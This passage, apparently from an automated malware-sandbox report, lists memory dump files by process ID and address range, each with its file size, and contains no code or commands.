                                                              672KB

                                                            • memory/5016-636-0x000001FC7D5E0000-0x000001FC7D6EC000-memory.dmp

                                                              Filesize

                                                              1.0MB

                                                            • memory/5016-3492-0x000001FC18070000-0x000001FC180C6000-memory.dmp

                                                              Filesize

                                                              344KB

                                                            • memory/5016-3493-0x000001FC180D0000-0x000001FC1811C000-memory.dmp

                                                              Filesize

                                                              304KB

                                                            • memory/5304-3747-0x000000006FFF0000-0x0000000070344000-memory.dmp

                                                              Filesize

                                                              3.3MB

                                                            • memory/5304-3746-0x00000000720C0000-0x000000007210C000-memory.dmp

                                                              Filesize

                                                              304KB

                                                            • memory/5764-3521-0x00000235B6CC0000-0x00000235B6CE2000-memory.dmp

                                                              Filesize

                                                              136KB

                                                            • memory/6844-3761-0x0000000006810000-0x000000000681A000-memory.dmp

                                                              Filesize

                                                              40KB

                                                            • memory/6844-3774-0x0000000007210000-0x00000000072EE000-memory.dmp

                                                              Filesize

                                                              888KB

                                                            • memory/6844-3760-0x0000000006730000-0x00000000067C2000-memory.dmp

                                                              Filesize

                                                              584KB

                                                            • memory/6844-3758-0x0000000006320000-0x0000000006400000-memory.dmp

                                                              Filesize

                                                              896KB

                                                            • memory/6844-3630-0x0000000005290000-0x0000000005354000-memory.dmp

                                                              Filesize

                                                              784KB

                                                            • memory/6844-3828-0x00000000077A0000-0x000000000787E000-memory.dmp

                                                              Filesize

                                                              888KB

                                                            • memory/6844-3629-0x0000000002990000-0x00000000029E6000-memory.dmp

                                                              Filesize

                                                              344KB